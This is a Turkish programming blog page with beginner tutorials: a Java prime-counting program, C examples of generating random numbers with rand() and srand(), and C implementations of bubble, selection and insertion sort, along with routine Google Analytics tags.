</code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>JAVA DİLİNDE</code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
public class asalsayi {
public static void main(String[] args) {
int bolen=0,asalsayi=0,i,j;
for( i=1;i<=10000;i++){
bolen=0;
for(j=1;j<=i;j++){
if(i%j==0)
bolen+=1;
}
if(bolen==2)
{
System.out.println("Asalsayi:" +i);
asalsayi+=1;
}
}
System.out.println("1 ile 10000 arasında " +asalsayi+ " asal sayi vardır");
}
</code></pre>
<script>// <![CDATA[
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-51160619-1', 'gurelahmet.com');
ga('send', 'pageview');
// ]]></script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
C Dilinde Rastgele Sayı Üretmek2014-05-13T14:01:00+00:00ahmetgurel.github.io/c/c%20dilinde%20rastgele%20say%C4%B1%20uretmek/random/2014/05/13/uretmek<div class="separator" style="clear: both; text-align: center;"><a href="http://gurelahmet.com/wp-content/uploads/2014/05/0.jpg"><img class="alignnone size-medium wp-image-29" src="http://gurelahmet.com/wp-content/uploads/2014/05/0-300x300.jpg" alt="0" width="300" height="300" /></a></div>
<p>C Dilinde Rastgele Sayı üretmek için rand(); fonksiyonu kullanılır bunun içinde <stdlib.h> kütüphanesi tanımlamak gerekir fakat asıl sorun her defasında aynı sayıyı üretmesi yada belli bir aralıkta sayı üretme sorunudur.Bunları tek tek ele alacağız önce rastgele sayı üreticez daha sonra 0 ile bir sayı arasında sayi üreticez en sonundada istediğimiz iki sayı arasında bir sayı üretip konuyu bitireceğiz :)</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
int main()
{
int rastgele;
rastgele=rand();
printf("%d",rastgele);
return 0;
getch();
}
</code></pre>
<p>Yukarıdaki kod blogunda kütüphaneleri tanımladıktan sonra rand fonksiyonu ile rastgele sayı üretip ekrana yazdırdık fakat bu sayı için herhangi bir aralık kullanmadık.Şimdide 0 ile 25 arasında rastgele sayı üreten kodu yazalım.</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
int main()
{
int rastgele;
rastgele=rand()%25;
printf("%d",rastgele);
return 0;
getch();
}
</code></pre>
<p>Bir önceki kodtan tek farki rand fonksiyonu % ile istediğimiz aralığa getirdik tabi ki bu aralık bu kod için 0 ile 25 arasında bu sadece 0 dan istediğimiz bir sayıya kadar rastgele üretir bunu 5 ile 25 arasında rastgele sayı üretmek için kullanalım.</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
int main()
{
int rastgele;
rastgele=5+rand()%20;
printf("%d",rastgele);
return 0;
getch();
}
</code></pre>
<p>Şimdi ele alacağımız bu yapı 5 ile 25 arasında sayı üretiyor üstte ki mantığı anladıysanız bu kısım çok daha basit rand()%20 ifadesi 0 ile 20 arasında sayı üretiyor bu üretilen sayıyıda önundekı 5 ile topluyoruz mantığı bu hangı sayı üretilirse 5 ekliyor 0 üretse sayı 5 oluyor 15 üretse 20 oluyor fakat en önemli kısım yazdıgımız tüm bu kodlar programı kaç kere çalıştırırsanız çalıştırın aynı sayıyı üretiyor her defasında farklı sayı üretmek içinde aşağıdaki kod bloğunu kullanıyoruz.</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
#include <stdio.h>
#include <conio.h>
#include <time.h>
#include <stdlib.h>
int main()
{
int rastgele;
srand(time(NULL));
rastgele=5+rand()%25;
printf("%d",rastgele);
return 0;
getch();
}
</code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code><span style="font-family: 'Times New Roman'; font-size: small; line-height: normal; white-space: normal;">Yukarıdaki yeni bir kütüphane olan <time.h> kütüphanesini ekleyeren </span><span style="font-family: 'Andale Mono', 'Lucida Console', Monaco, fixed, monospace; white-space: normal;">srand(time(NULL)); bu kod satırını eklediğimizde program her defasında farklı bir sayıyı üretmiş olacak C dilinde rastgele sayı üretmek böyle diğer dillerdede bu yapı çok farklı değil bazı küçük farklılıklar oluyor sadece yazımız burada bitiyor başka bir yazıyla görüşmek üzere :) </span>
</code></pre>
<p><span style="background-color: #eeeeee; font-family: 'Andale Mono', 'Lucida Console', Monaco, fixed, monospace; font-size: 12px; line-height: 14px;">
</span>
<span style="background-color: #eeeeee; font-family: 'Andale Mono', 'Lucida Console', Monaco, fixed, monospace; font-size: 12px; line-height: 14px;">
</span>
<span style="background-color: #eeeeee; font-family: 'Andale Mono', 'Lucida Console', Monaco, fixed, monospace; font-size: 12px; line-height: 14px;">
</span></p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
C Dilinde Sıralama Algoritmaları2014-05-13T13:19:00+00:00ahmetgurel.github.io/algoritma/bubble%20sort%20algoritmasi/c/c%20de%20s%C4%B1ralama%20algoritmas%C4%B1/insertion%20sort%20algoritmasi/selection%20sort%20algoritmasi/s%C4%B1ralama%20algoritmas%C4%B1/2014/05/13/c-dilinde-siralama-algoritmalari<div class="separator" style="clear: both; text-align: center;"></div>
<div class="separator" style="clear: both; text-align: center;"></div>
<div class="separator" style="clear: both; text-align: center;"></div>
<p> </p>
<p> </p>
<div class="separator" style="clear: both; text-align: center;"><a style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" href="http://3.bp.blogspot.com/--jcjO80cEWo/UxDHDFc8hPI/AAAAAAAAAMI/3_kwx64XNpo/s1600/1.gif"><img src="http://3.bp.blogspot.com/--jcjO80cEWo/UxDHDFc8hPI/AAAAAAAAAMI/3_kwx64XNpo/s1600/1.gif" alt="" border="0" /></a><a style="margin-left: 1em; margin-right: 1em;" href="http://3.bp.blogspot.com/-8Bv1tN9CTkI/UxDHC_Y_uFI/AAAAAAAAAME/sa3Q0yrNSoE/s1600/2.gif"><img class="alignnone" title="sıralama algoritmaları" src="http://3.bp.blogspot.com/-8Bv1tN9CTkI/UxDHC_Y_uFI/AAAAAAAAAME/sa3Q0yrNSoE/s1600/2.gif" alt="" width="86" height="320" border="0" /></a></div>
<p> </p>
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee; font-size: 12px; border: 1px dashed #999999; line-height: 14px; padding: 5px; overflow: auto; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com| www.eternusyazilim.com
ahmet5794@gmail.com | ahmetgurel.yazilim@gmail.com */
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
//---- BUBBLE SORT ALGORITMASI ----//
void bubble(int array[],int size)
{
int i,j,temp;
for(i=1;i<size;i++)
{
for(j=0;j<size-i;j++)
{
if(array[j]>array[j+1])
{
temp=array[j+1];
array[j+1]=array[j];
array[j]=temp;
}
}
}
for(i=0;i<size;i++)
printf("%d ",array[i]);
}
//---- SELECTION SORT ALGORITMASI ----//
void selection(int array[],int size)
{
int i,j,temp,min;
for(i=0;i<size-1;i++)
{
min=i;
for(j=i+1;j<size;j++)
{
if(array[j]<array[min])
min=j;
}
temp=array[i];
array[i]=array[min];
array[min]=temp;
}
for(i=0;i<size;i++)
printf("%d ",array[i]);
}
//---- INSERTION SORT ALGORITMASI ----//
void insertion(int array[],int size)
{
int i,j,temp;
for(i=0;i<size;i++)
{
for(j=0;j<i+1;j++)
{
if(array[j]>array[i])
{
temp=array[i];
array[i]=array[j];
array[j]=temp;
}
}
}
for(i=0;i<size;i++)
printf("%d ",array[i]);
}
int main(int argc, char *argv[]) {
int dizi[]={9,4,6,2,8,1};
bubble(dizi,6);
puts("");
selection(dizi,6);
puts("");
insertion(dizi,6);
getch();
return 0;
}
</code></pre>
</conio.h></stdlib.h></stdio.h></code></pre>